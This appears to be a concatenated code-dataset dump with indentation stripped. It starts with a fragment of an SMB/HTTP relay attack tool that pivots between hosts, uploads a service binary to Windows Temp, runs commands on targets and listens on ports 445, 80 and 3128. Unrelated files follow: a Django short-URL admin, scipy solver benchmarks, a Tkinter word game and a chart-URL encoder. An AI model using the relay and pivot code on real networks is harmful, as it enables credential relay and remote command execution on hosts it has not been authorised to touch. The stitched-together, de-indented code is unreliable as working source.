if Status == True:
print("[+] Pivoting to %s."%(Pivot[0]))
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
#shell will close.
del ShellOpen[:]
#update the new host.
Host = [Pivot[0]]
#we're in pivoting mode.
Pivoting = ["1"]
data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
del Cmd[:]
s.close()
return None
if Status == False:
print("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
del Cmd[:]
del Pivot[:]
else:
print(RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if Scan:
LocalIp = FindLocalIp()
Range = ConvertToClassC(Target[0], Scan[0])
RunPivotScan(Range, Target[0])
del Cmd[:]
if Help:
ShowHelp()
del Cmd[:]
##Let go with the command.
if any(x in Cmd for x in Cmd):
if len(Cmd[0]) > 1:
if os.path.isfile(SysSVCFileName):
FileSize, FileContent = UploadContent(SysSVCFileName)
FileName = os.path.basename(SysSVCFileName)
RunPath = '%windir%\\Temp\\'+FileName
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
del Cmd[:]
else:
print(SysSVCFileName+" does not exist, please specify a valid file.")
del Cmd[:]
if isinstance(data, str):
data = data.encode('latin-1')
if data is None:
print("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
if data[8:10] == b"\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'))
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(NetworkSendBufferPython2or3(buffer1))
data = s.recv(2048)
class ThreadingTCPServer(TCPServer):
def server_bind(self):
TCPServer.server_bind(self)
ThreadingTCPServer.allow_reuse_address = 1
ThreadingTCPServer.daemon_threads = True
def serve_thread_tcp(host, port, handler):
try:
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print(color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
def main():
try:
threads = []
threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
if ExtraPort != 0:
threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
for thread in threads:
thread.setDaemon(True)
thread.start()
while True:
time.sleep(1)
except (KeyboardInterrupt, SystemExit):
##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
##This is a bug in python readline when dealing with raw_input()..
if ShellOpen:
os.system('stty sane')
##Then exit
sys.exit("\rExiting...")
if __name__ == '__main__':
main()
| gpl-3.0 | 4,106,894,401,780,348,400 | 45.454865 | 199 | 0.554434 | false |
martingms/django-globalshorturls | globalshorturls/admin/contrib.py | 1 | 2513 | # encoding: utf-8
from django.contrib.admin import site, ModelAdmin
from globalshorturls.models import Shorturl
from django.forms import ModelForm
from django.contrib.admin.filterspecs import FilterSpec, ChoicesFilterSpec
from django.utils.translation import ugettext as _
from django.utils.encoding import smart_unicode
# The list of objects can get extremely long. This method will
# override the filter-method for objects by specifying an extra
# attribute on the list of choices, thus only displaying a filter
# method to those objects actually existing in the database.
# Taken from: http://djangosnippets.org/snippets/1879/
class CustomChoiceFilterSpec(ChoicesFilterSpec):
def __init__(self, f, request, params, model, model_admin):
super(CustomChoiceFilterSpec, self).__init__(f, request, params, model, model_admin)
self.lookup_kwarg = '%s__id__exact' % f.name
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.objects = model.objects.all()
def choices(self, cl):
yield {'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All')}
items = [i.creator for i in self.objects]
items = list(set(items))
for k in items:
yield {'selected': smart_unicode(k) == self.lookup_val,
'query_string': cl.get_query_string({self.lookup_kwarg: k.id}),
'display': k}
FilterSpec.filter_specs.insert(0, (lambda f: getattr(f, 'compact_filter', False), CustomChoiceFilterSpec))
# This form is identical to the ShorturlForm in models.py, but I keep them separate so that it is possible to change them
# without interfering with the other
class ShorturlAdminForm(ModelForm):
class Meta:
model = Shorturl
def clean_url(self):
url = self.cleaned_data['url']
if url.startswith('http'):
return url
else:
return 'http://'+url
class ShorturlAdmin(ModelAdmin):
# You might want to add has_change_permission and has_delete_permission here if anyone but staff can view admin
form = ShorturlAdminForm
fields = ('url',)
search_fields = ['url']
list_display = ('url', 'full_shorturl', 'creator', 'counter',)
list_filter = ('creator',)
def save_model(self, request, obj, form, change):
if not obj.creator:
obj.creator = request.user
obj.save()
site.register(Shorturl, ShorturlAdmin) | mit | 8,428,196,929,774,937,000 | 37.676923 | 121 | 0.671707 | false |
dominicelse/scipy | benchmarks/benchmarks/sparse_linalg_solve.py | 30 | 2163 | """
Check the speed of the conjugate gradient solver.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import assert_equal
try:
from scipy import linalg, sparse
from scipy.sparse.linalg import cg, minres, spsolve
except ImportError:
pass
try:
from scipy.sparse.linalg import lgmres
except ImportError:
pass
from .common import Benchmark
def _create_sparse_poisson1d(n):
# Make Gilbert Strang's favorite matrix
# http://www-math.mit.edu/~gs/PIX/cupcakematrix.jpg
P1d = sparse.diags([[-1]*(n-1), [2]*n, [-1]*(n-1)], [-1, 0, 1])
assert_equal(P1d.shape, (n, n))
return P1d
def _create_sparse_poisson2d(n):
P1d = _create_sparse_poisson1d(n)
P2d = sparse.kronsum(P1d, P1d)
assert_equal(P2d.shape, (n*n, n*n))
return P2d.tocsr()
class Bench(Benchmark):
params = [
[4, 6, 10, 16, 25, 40, 64, 100],
['dense', 'spsolve', 'cg', 'minres', 'lgmres']
]
param_names = ['(n,n)', 'solver']
def setup(self, n, solver):
if solver == 'dense' and n >= 25:
raise NotImplementedError()
self.b = np.ones(n*n)
self.P_sparse = _create_sparse_poisson2d(n)
if solver == 'dense':
self.P_dense = self.P_sparse.A
def time_solve(self, n, solver):
if solver == 'dense':
linalg.solve(self.P_dense, self.b)
elif solver == 'cg':
cg(self.P_sparse, self.b)
elif solver == 'minres':
minres(self.P_sparse, self.b)
elif solver == 'lgmres':
lgmres(self.P_sparse, self.b)
elif solver == 'spsolve':
spsolve(self.P_sparse, self.b)
else:
raise ValueError('Unknown solver: %r' % solver)
class Lgmres(Benchmark):
params = [
[10, 50, 100, 1000, 10000],
[10, 30, 60, 90, 180],
]
param_names = ['n', 'm']
def setup(self, n, m):
np.random.seed(1234)
self.A = sparse.eye(n, n) + sparse.rand(n, n, density=0.01)
self.b = np.ones(n)
def time_inner(self, n, m):
lgmres(self.A, self.b, inner_m=m, maxiter=1)
| bsd-3-clause | -5,272,682,686,121,058,000 | 25.060241 | 67 | 0.574202 | false |
dencee/AWG | AWG_App_py3.py | 1 | 19683 | # Title: AWG - Akemi's Word Game
# Author: Daniel Commins
# Date: June 13, 2015
# Files: AWG_App_py2.py; SINGLE.TXT (dictionary words file)
# Tested: python 2.61
# Info: Akemi's Word Game: The game where you try and guess the computer's randomly
# selected word! Each letter appears only once.
import sys
import random
import tkinter
import tkinter.messagebox
GAME_VERSION = "1.3"
class CurGuess_t :
def __init__(self) :
self.entry = None
self.button = None
class PastGuesses_t :
def __init__(self) :
self.pastGuess = None
self.result = None
self.guess = None
self.matches = None
class WordGame_tk( tkinter.Tk ) :
entryWidth = 30 # in chars
guessStartRow = 8 # using grid()
dictWordListEasy = None # only needs to be read once for all instances
dictWordListHard = None # only needs to be read once for all instances
def __init__( self, parent ):
tkinter.Tk.__init__(self, parent)
self.parent = parent
self.initialize()
def initialize(self):
self.minLetters = 4
self.maxLetters = 12
self.maxAttempts = 10
self.numLetters = None # number of letters in word once game starts
self.numGuesses = None # number of guesses at word once game starts
self.curGuessNum = None # tracks users guesses so far
self.curGuess = CurGuess_t() # contains widget for the user entry widgets
self.guesses = [PastGuesses_t() for i in range( self.maxAttempts )] # one for each guess that can be made
self.statusText = tkinter.StringVar() # string message on the status line
self.statusLabel = None # status label widget
self.randomWord = None # randomly selected word from dictionary
self.wordList = list() # stores words from dictionary of the specified length
self.pluralCheckVal = tkinter.IntVar() # stores value from user option to include word plurals
self.exSpacesCheckVal = tkinter.IntVar()# stores value from user option to include extra spaces in result
self.difficultyVal = tkinter.IntVar() # stores the game difficulty level
self.checkPlurals = None # stores the plural check option when game starts
self.extraSpaces = None # stores the option to add a space every character in result
self.difficulty = None # stores the game difficulty level when the game starts
# Open and read large words file once if necessary
self.ReadWordsFile()
# Set grid geometry
self.grid()
# Plural checkbox; enable by default
pluralCheckButton = tkinter.Checkbutton( self, text="omit 's'/'es' plurals", variable=self.pluralCheckVal, onvalue=1, offvalue=0 )
pluralCheckButton.grid( row=0, column=0, sticky='w' )
pluralCheckButton.select()
# Extra spaces checkbox; disable by default
extraSpacesCheckButton = tkinter.Checkbutton( self, text="extra spaces", variable=self.exSpacesCheckVal, onvalue=1, offvalue=0 )
extraSpacesCheckButton.grid( row=0, column=0, sticky='e' )
extraSpacesCheckButton.deselect()
# Info button
infoButton = tkinter.Button( self, text="Info", borderwidth=0, justify='center', command=self.OnInfo )
infoButton.grid( row=0, column=1, sticky='n', rowspan=1 )
# Game difficulty level radio buttons
radioButton = tkinter.Radiobutton( self, text="Easy", variable=self.difficultyVal, value=0 )
radioButton.grid( row=1, column=0, sticky='w' )
radioButton = tkinter.Radiobutton( self, text="Hard", variable=self.difficultyVal, value=2)
radioButton.grid( row=1, column=0, sticky='' )
# Number of letters option
lettersText = tkinter.Label( self, anchor='w', text="Number of Letters [%d-%d]" %(self.minLetters, self.maxLetters) )
lettersText.grid( row=2, column=0, sticky='w' )
self.lettersEntry = tkinter.Spinbox( self, from_=self.minLetters, to=self.maxLetters, width=3 )
self.lettersEntry.grid( row=2, column=1, sticky='w' )
self.lettersEntry.delete( 0, 3 )
self.lettersEntry.insert( 0, '5' )
# Number of guesses option
numGuessesText = tkinter.Label( self, anchor="w", text="Number of Guesses [1-%d]" %(self.maxAttempts) )
numGuessesText.grid( row=3, column=0, sticky='w' )
self.guessesEntry = tkinter.Spinbox( self, from_="1", to=self.maxAttempts, width=3 )
self.guessesEntry.grid( row=3, column=1, sticky='w' )
self.guessesEntry.delete( 0, 3 )
self.guessesEntry.insert( 0, '5' )
# Statement of rules
legendText1 = tkinter.Label( self, anchor='center', text="*Each letter is used only once*", borderwidth=0, bg='yellow', padx=4, width=WordGame_tk.entryWidth )
legendText2 = tkinter.Label( self, anchor='w', text="O = right letter, wrong location", borderwidth=0, bg='cyan', padx=4, width=WordGame_tk.entryWidth )
legendText3 = tkinter.Label( self, anchor='w', text="\u25b2 = right letter, right location", borderwidth=0, bg='green', padx=4, width=WordGame_tk.entryWidth )
legendText4 = tkinter.Label( self, anchor='w', text="_ = letter not in word", borderwidth=0, bg='red', padx=4, width=WordGame_tk.entryWidth )
legendText1.grid( row=4, column=0, sticky='w' )
legendText2.grid( row=5, column=0, sticky='w' )
legendText3.grid( row=6, column=0, sticky='w' )
legendText4.grid( row=7, column=0, sticky='w' )
# Quit button
quitButton = tkinter.Button( self, text="Exit", borderwidth=0, justify='center', width=len('Start'), command=self.OnExit )
quitButton.grid( row=5, column=1, sticky='n', rowspan=2 )
# Game start button
startButton = tkinter.Button( self, text="Start", borderwidth=0, justify='center', width=len('Start'), command=self.OnStart )
startButton.grid( row=6, column=1, sticky='s', rowspan=2 )
def OnInfo(self) :
infoString = "==Akemi's Word Game v" + GAME_VERSION + "=="
infoString = infoString + "\n\nThe game where you try and guess"
infoString = infoString + "\nthe randomly generated word!"
infoString = infoString + "\n\nGame originally hosted on Github:"
infoString = infoString + "\nhttps://github.com/dencee/AWG"
infoString = infoString + "\n\nHave Fun!!!"
tkinter.messagebox.showinfo( "AWG Info", infoString )
def OnExit(self) :
self.destroy() # So dramatic!
def OnStart(self) :
# Get plural option only once when the game starts so the value can't be adjusted mid-game
self.checkPlurals = self.pluralCheckVal.get()
# Get extra spaces option
self.extraSpaces = self.exSpacesCheckVal.get()
# Get the game difficulty
self.difficulty = self.difficultyVal.get()
# Get number of guesses and letters here only ONCE when the game starts
try :
self.numLetters = int( self.lettersEntry.get() )
except :
self.numLetters = None
try :
self.numGuesses = int( self.guessesEntry.get() )
except :
self.numGuesses = None
# Check for valid input parameters and get random word
if ( self.numGuesses == None or self.numGuesses > self.maxAttempts or self.numGuesses <= 0 or
self.numLetters == None or self.numLetters > self.maxLetters or self.numLetters < self.minLetters ) :
statusText = "Invalid input parameters!"
self.numLetters = None
self.numGuesses = None
else :
statusText = "Guess the '%d' letter word!" %(self.numLetters)
if ( self.difficulty == 0 ) :
self.randomWord = self.GetRandomWord( WordGame_tk.dictWordListEasy, self.numLetters )
else :
self.randomWord = self.GetRandomWord( WordGame_tk.dictWordListHard, self.numLetters )
# Reset the number of guesses that've been made
self.curGuessNum = 0
startRow = WordGame_tk.guessStartRow
# Print status label if necessary
if self.statusLabel == None :
self.statusLabel = tkinter.Label( self, textvariable=self.statusText, borderwidth=0, width=WordGame_tk.entryWidth )
self.statusLabel.grid( row=startRow, column=0 )
else :
self.statusLabel.grid()
self.statusText.set( statusText )
startRow = ( startRow + 1 )
# Print user guess entry field if necessary
if self.numLetters != None :
if self.curGuess.entry == None :
self.curGuess.entry = tkinter.Entry( self, borderwidth=0, width=WordGame_tk.entryWidth, bg='gray80', state='normal' )
self.curGuess.entry.insert( 0, "<Enter Guess>" )
self.curGuess.entry.grid( row=startRow, column=0 )
else :
self.curGuess.entry.grid()
self.curGuess.entry.delete( 0, 'end' )
# Print the user guess button if necessary
if self.numLetters != None :
if self.curGuess.button == None :
self.curGuess.button = tkinter.Button( self, text="Guess", borderwidth=0, justify='center', width=len('Start'), command=self.OnGuess )
self.curGuess.button.grid( row=startRow-1, column=1, sticky='s', rowspan=2 ) # -1 because rowspan=2
else :
self.curGuess.button.grid()
startRow = ( startRow + 1 )
# First time 'Start' is pressed, create all the guess entries and leave them blank
# TODO: Possibly reverse the if and for statements
if self.guesses[0].pastGuess == None :
for eachGuess in range( self.maxAttempts ) :
self.guesses[eachGuess].guess = tkinter.StringVar()
self.guesses[eachGuess].matches = tkinter.StringVar()
self.guesses[eachGuess].guess.set( "" )
self.guesses[eachGuess].matches.set( "" )
self.guesses[eachGuess].pastGuess = tkinter.Label( self, textvariable=self.guesses[eachGuess].guess, borderwidth=0, anchor='w', width=WordGame_tk.entryWidth )
self.guesses[eachGuess].result = tkinter.Label( self, textvariable=self.guesses[eachGuess].matches, borderwidth=0, anchor='w', width=WordGame_tk.entryWidth )
self.guesses[eachGuess].pastGuess.grid( row=startRow, column=0 )
self.guesses[eachGuess].result.grid( row=(startRow+1), column=0 )
startRow = ( startRow + 2 )
# Show and hide the guess entries based on how many guesses the user selected
for eachGuess in range( self.maxAttempts ) :
# Clear all previous guess and result data output
self.guesses[eachGuess].guess.set( "" )
self.guesses[eachGuess].matches.set( "" )
if eachGuess < self.numGuesses :
# Show the guess entry
self.guesses[eachGuess].pastGuess.grid()
self.guesses[eachGuess].result.grid()
else :
# Hide the guess entry
self.guesses[eachGuess].pastGuess.grid_remove()
self.guesses[eachGuess].result.grid_remove()
def OnGuess(self) :
# Check users guess string
userGuess = self.curGuess.entry.get().lower()
# Check for valid word length
if len(userGuess) != self.numLetters :
self.statusText.set( "Error: Please input '%d' letters" %(self.numLetters) )
else :
# Note - want to allow repeating letters because user may be trying to guess
# the location of one of the letters
invalidLetter = False
for letter in userGuess :
if ( ( letter < 'a' ) or ( letter > 'z' ) ) :
invalidLetter = True
break
# Check valid symbols
if invalidLetter == True :
self.statusText.set( "Error: Invalid symbols in word" )
else :
# Valid entry! Check letter matches with the random word
resultList = list()
wrongLetters = 0
# Loop letters in guess word, checking letter in word, then correct position
for index, letter in enumerate( userGuess ) :
if letter in self.randomWord :
if ( userGuess[index] == self.randomWord[index] ) :
resultList.append("\u25b2") # unicode char for triangle
else :
resultList.append("O")
wrongLetters = wrongLetters + 1
else :
resultList.append("_")
wrongLetters = wrongLetters + 1
if self.extraSpaces != 0 :
# Skip space every character for readability
if len( resultList ) != 0 :
resultList.append(" ")
if wrongLetters == 0 :
# Correct guess!
self.OnMatch()
else :
# Incorrect guess! Print the resulting letter matches.
# String join method to convert list of chars to string
guessNumStr = "%2d: " %(self.curGuessNum+1)
# "00: "
self.guesses[self.curGuessNum].matches.set( " "+"".join(resultList) )
self.guesses[self.curGuessNum].guess.set( guessNumStr+userGuess )
self.curGuessNum = ( self.curGuessNum + 1 )
if self.curGuessNum < int( self.numGuesses ) :
# Still more chances to guess...
self.statusText.set( "<Guess %d/%d>" %((self.curGuessNum+1), self.numGuesses ) )
self.curGuess.entry.delete( 0, 'end' )
else :
# No more chances, game over :(
self.statusText.set( "Random word was: "+self.randomWord )
self.curGuess.button.grid_remove()
def GetRandomWord( self, listOfWords, numLetters ) :
randomWord = None
# TODO: optimize so that the list doesn't have to be re-created
# if the same number of letters are chosen
del self.wordList[:]
# Loop through all words in the dictionary file (SINGLE.TXT) to extract the ones
# matching the game criteria
for index, word in enumerate( listOfWords ) :
if ( len(word) == numLetters ) :
lettersInWord = dict()
# Loop through all the letters and,
# 1) check it's a valid lowercase letter
# 2) count the occurrence of each letter--it's illegal to have a
# letter occur more than once in a word
for letter in word :
if ( ( letter < 'a' ) or ( letter > 'z' ) ) :
# Word can only contain lower-case letters: no pronouns,
# apostrophes, accents, etc. stop checking other letters if found
break
# TODO: Don't really need to keep track of the number of occurrences
# since I'm just looking at dictionary length size.
lettersInWord[letter] = lettersInWord.get( letter, 0 ) + 1
# Check only 1 instance of each letter:
# If each letter occurred only once, then the dictionary size will be
# equal to the length of the word string that was read
if len(lettersInWord) == len(word) :
# 0 = box not checked (include plurals); 1 = box checked (omit plurals)
if self.checkPlurals != 0 :
# Want to determine if this word is a plural so look back in the sorted
# dictionary list and grab some of the words before it. If there's
# the same word without an 's' or 'es' at the end, this word's a plural
if index > 10 :
startIndex = ( index - 10 )
else :
startIndex = 0
pastWords = tuple( listOfWords[ startIndex : index ] )
# Check for plural words ending in 's':
# if word ends in an 's' and there's the same word without an 's' at the
# end then consider this word a plural. No 100% accurate, but given the
# size of the word list file it's acceptable.
if ( word[len(word)-1] == 's' ) and ( word[ : (len(word)-1) ] in pastWords ) :
continue # continue, not break--still searching for other words
# Check for plural words ending in 'es':
# Same for plurals ending in 's'
if ( word[ (len(word)-2) : ] == 'es' ) and ( word[ : (len(word)-2) ] in pastWords ) :
continue # continue, not break--still searching for other words
# Valid word found...Finally!
self.wordList.append(word)
# Make sure the list is populated with words
if ( len(self.wordList) != 0 ) :
randomIndex = random.randint( 0, ( len( self.wordList ) - 1 ) )
randomWord = self.wordList[ randomIndex ]
return ( randomWord )
def OnMatch(self) :
self.statusText.set( "Correct guess, YOU WIN!!!" )
self.curGuess.button.grid_remove()
def ReadWordsFile(self) :
# Only need to be read once
if ( WordGame_tk.dictWordListEasy == None ) :
fileHandle = None
wordFile = "EASY.TXT"
# 'with' statement will automatically close the file afterwards
with open(wordFile) as fileHandle :
# Populate list with all words read from file
WordGame_tk.dictWordListEasy = fileHandle.read().splitlines()
# Sort the list so it'll be easier to find plurals
WordGame_tk.dictWordListEasy.sort()
# Only need to be read once
if ( WordGame_tk.dictWordListHard == None ) :
fileHandle = None
wordFile = "HARD.TXT"
# 'with' statement will automatically close the file afterwards
with open(wordFile) as fileHandle :
# Populate list with all words read from file
WordGame_tk.dictWordListHard = fileHandle.read().splitlines()
# Sort the list so it'll be easier to find plurals
WordGame_tk.dictWordListHard.sort()
if __name__ == '__main__':
game = WordGame_tk(None)
game.title("Akemi's Word Game")
game.mainloop()
| mit | 3,234,303,404,919,293,000 | 48.581864 | 174 | 0.564396 | false |
jevgen/namebench | nb_third_party/graphy/backends/google_chart_api/encoders.py | 230 | 14800 | #!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Display objects for the different kinds of charts.
Not intended for end users, use the methods in __init__ instead."""
import warnings
from graphy.backends.google_chart_api import util
class BaseChartEncoder(object):
"""Base class for encoders which turn chart objects into Google Chart URLS.
Object attributes:
extra_params: Dict to add/override specific chart params. Of the
form param:string, passed directly to the Google Chart API.
For example, 'cht':'lti' becomes ?cht=lti in the URL.
url_base: The prefix to use for URLs. If you want to point to a different
server for some reason, you would override this.
formatters: TODO: Need to explain how these work, and how they are
different from chart formatters.
enhanced_encoding: If True, uses enhanced encoding. If
False, simple encoding is used.
escape_url: If True, URL will be properly escaped. If False, characters
like | and , will be unescapped (which makes the URL easier to
read).
"""
def __init__(self, chart):
self.extra_params = {} # You can add specific params here.
self.url_base = 'http://chart.apis.google.com/chart'
self.formatters = self._GetFormatters()
self.chart = chart
self.enhanced_encoding = False
self.escape_url = True # You can turn off URL escaping for debugging.
self._width = 0 # These are set when someone calls Url()
self._height = 0
def Url(self, width, height, use_html_entities=False):
"""Get the URL for our graph.
Args:
use_html_entities: If True, reserved HTML characters (&, <, >, ") in the
URL are replaced with HTML entities (&, <, etc.). Default is False.
"""
self._width = width
self._height = height
params = self._Params(self.chart)
return util.EncodeUrl(self.url_base, params, self.escape_url,
use_html_entities)
def Img(self, width, height):
"""Get an image tag for our graph."""
url = self.Url(width, height, use_html_entities=True)
tag = '<img src="%s" width="%s" height="%s" alt="chart"/>'
return tag % (url, width, height)
def _GetType(self, chart):
"""Return the correct chart_type param for the chart."""
raise NotImplementedError
def _GetFormatters(self):
"""Get a list of formatter functions to use for encoding."""
formatters = [self._GetLegendParams,
self._GetDataSeriesParams,
self._GetColors,
self._GetAxisParams,
self._GetGridParams,
self._GetType,
self._GetExtraParams,
self._GetSizeParams,
]
return formatters
def _Params(self, chart):
"""Collect all the different params we need for the URL. Collecting
all params as a dict before converting to a URL makes testing easier.
"""
chart = chart.GetFormattedChart()
params = {}
def Add(new_params):
params.update(util.ShortenParameterNames(new_params))
for formatter in self.formatters:
Add(formatter(chart))
for key in params:
params[key] = str(params[key])
return params
def _GetSizeParams(self, chart):
"""Get the size param."""
return {'size': '%sx%s' % (int(self._width), int(self._height))}
def _GetExtraParams(self, chart):
"""Get any extra params (from extra_params)."""
return self.extra_params
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
y_min, y_max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
series_data = []
markers = []
for i, series in enumerate(chart.data):
data = series.data
if not data: # Drop empty series.
continue
series_data.append(data)
for x, marker in series.markers:
args = [marker.shape, marker.color, i, x, marker.size]
markers.append(','.join(str(arg) for arg in args))
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, series_data, y_min, y_max, encoder)
result.update(util.JoinLists(marker = markers))
return result
def _GetColors(self, chart):
"""Color series color parameter."""
colors = []
for series in chart.data:
if not series.data:
continue
colors.append(series.style.color)
return util.JoinLists(color = colors)
def _GetDataEncoder(self, chart):
"""Get a class which can encode the data the way the user requested."""
if not self.enhanced_encoding:
return util.SimpleDataEncoder()
return util.EnhancedDataEncoder()
def _GetLegendParams(self, chart):
"""Get params for showing a legend."""
if chart._show_legend:
return util.JoinLists(data_series_label = chart._legend_labels)
return {}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Return axis.labels & axis.label_positions."""
return axis.labels, axis.label_positions
def _GetAxisParams(self, chart):
"""Collect params related to our various axes (x, y, right-hand)."""
axis_types = []
axis_ranges = []
axis_labels = []
axis_label_positions = []
axis_label_gridlines = []
mark_length = max(self._width, self._height)
for i, axis_pair in enumerate(a for a in chart._GetAxes() if a[1].labels):
axis_type_code, axis = axis_pair
axis_types.append(axis_type_code)
if axis.min is not None or axis.max is not None:
assert axis.min is not None # Sanity check: both min & max must be set.
assert axis.max is not None
axis_ranges.append('%s,%s,%s' % (i, axis.min, axis.max))
labels, positions = self._GetAxisLabelsAndPositions(axis, chart)
if labels:
axis_labels.append('%s:' % i)
axis_labels.extend(labels)
if positions:
positions = [i] + list(positions)
axis_label_positions.append(','.join(str(x) for x in positions))
if axis.label_gridlines:
axis_label_gridlines.append("%d,%d" % (i, -mark_length))
return util.JoinLists(axis_type = axis_types,
axis_range = axis_ranges,
axis_label = axis_labels,
axis_position = axis_label_positions,
axis_tick_marks = axis_label_gridlines,
)
def _GetGridParams(self, chart):
"""Collect params related to grid lines."""
x = 0
y = 0
if chart.bottom.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.bottom.min is not None)
assert(chart.bottom.max is not None)
total = float(chart.bottom.max - chart.bottom.min)
x = 100 * chart.bottom.grid_spacing / total
if chart.left.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.left.min is not None)
assert(chart.left.max is not None)
total = float(chart.left.max - chart.left.min)
y = 100 * chart.left.grid_spacing / total
if x or y:
return dict(grid = '%.3g,%.3g,1,0' % (x, y))
return {}
class LineChartEncoder(BaseChartEncoder):
"""Helper class to encode LineChart objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lc'}
def _GetLineStyles(self, chart):
"""Get LineStyle parameters."""
styles = []
for series in chart.data:
style = series.style
if style:
styles.append('%s,%s,%s' % (style.width, style.on, style.off))
else:
# If one style is missing, they must all be missing
# TODO: Add a test for this; throw a more meaningful exception
assert (not styles)
return util.JoinLists(line_style = styles)
def _GetFormatters(self):
out = super(LineChartEncoder, self)._GetFormatters()
out.insert(-2, self._GetLineStyles)
return out
class SparklineEncoder(LineChartEncoder):
"""Helper class to encode Sparkline objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lfi'}
class BarChartEncoder(BaseChartEncoder):
"""Helper class to encode BarChart objects into Google Chart URLs."""
__STYLE_DEPRECATION = ('BarChart.display.style is deprecated.' +
' Use BarChart.style, instead.')
def __init__(self, chart, style=None):
"""Construct a new BarChartEncoder.
Args:
style: DEPRECATED. Set style on the chart object itself.
"""
super(BarChartEncoder, self).__init__(chart)
if style is not None:
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
chart.style = style
def _GetType(self, chart):
# Vertical Stacked Type
types = {(True, False): 'bvg',
(True, True): 'bvs',
(False, False): 'bhg',
(False, True): 'bhs'}
return {'chart_type': types[(chart.vertical, chart.stacked)]}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Reverse labels on the y-axis in horizontal bar charts.
(Otherwise the labels come out backwards from what you would expect)
"""
if not chart.vertical and axis == chart.left:
# The left axis of horizontal bar charts needs to have reversed labels
return reversed(axis.labels), reversed(axis.label_positions)
return axis.labels, axis.label_positions
def _GetFormatters(self):
out = super(BarChartEncoder, self)._GetFormatters()
# insert at -2 to allow extra_params to overwrite everything
out.insert(-2, self._ZeroPoint)
out.insert(-2, self._ApplyBarChartStyle)
return out
def _ZeroPoint(self, chart):
"""Get the zero-point if any bars are negative."""
# (Maybe) set the zero point.
min, max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
out = {}
if min < 0:
if max < 0:
out['chp'] = 1
else:
out['chp'] = -min/float(max - min)
return out
def _ApplyBarChartStyle(self, chart):
"""If bar style is specified, fill in the missing data and apply it."""
# sanity checks
if chart.style is None or not chart.data:
return {}
(bar_thickness, bar_gap, group_gap) = (chart.style.bar_thickness,
chart.style.bar_gap,
chart.style.group_gap)
# Auto-size bar/group gaps
if bar_gap is None and group_gap is not None:
bar_gap = max(0, group_gap / 2)
if not chart.style.use_fractional_gap_spacing:
bar_gap = int(bar_gap)
if group_gap is None and bar_gap is not None:
group_gap = max(0, bar_gap * 2)
# Set bar thickness to auto if it is missing
if bar_thickness is None:
if chart.style.use_fractional_gap_spacing:
bar_thickness = 'r'
else:
bar_thickness = 'a'
else:
# Convert gap sizes to pixels if needed
if chart.style.use_fractional_gap_spacing:
if bar_gap:
bar_gap = int(bar_thickness * bar_gap)
if group_gap:
group_gap = int(bar_thickness * group_gap)
# Build a valid spec; ignore group gap if chart is stacked,
# since there are no groups in that case
spec = [bar_thickness]
if bar_gap is not None:
spec.append(bar_gap)
if group_gap is not None and not chart.stacked:
spec.append(group_gap)
return util.JoinLists(bar_size = spec)
def __GetStyle(self):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
return self.chart.style
def __SetStyle(self, value):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
self.chart.style = value
style = property(__GetStyle, __SetStyle, __STYLE_DEPRECATION)
class PieChartEncoder(BaseChartEncoder):
"""Helper class for encoding PieChart objects into Google Chart URLs.
Fuzzy frogs frolic in the forest.
Object Attributes:
is3d: if True, draw a 3d pie chart. Default is False.
"""
def __init__(self, chart, is3d=False, angle=None):
"""Construct a new PieChartEncoder.
Args:
is3d: If True, draw a 3d pie chart. Default is False. If the pie chart
includes multiple pies, is3d must be set to False.
angle: Angle of rotation of the pie chart, in radians.
"""
super(PieChartEncoder, self).__init__(chart)
self.is3d = is3d
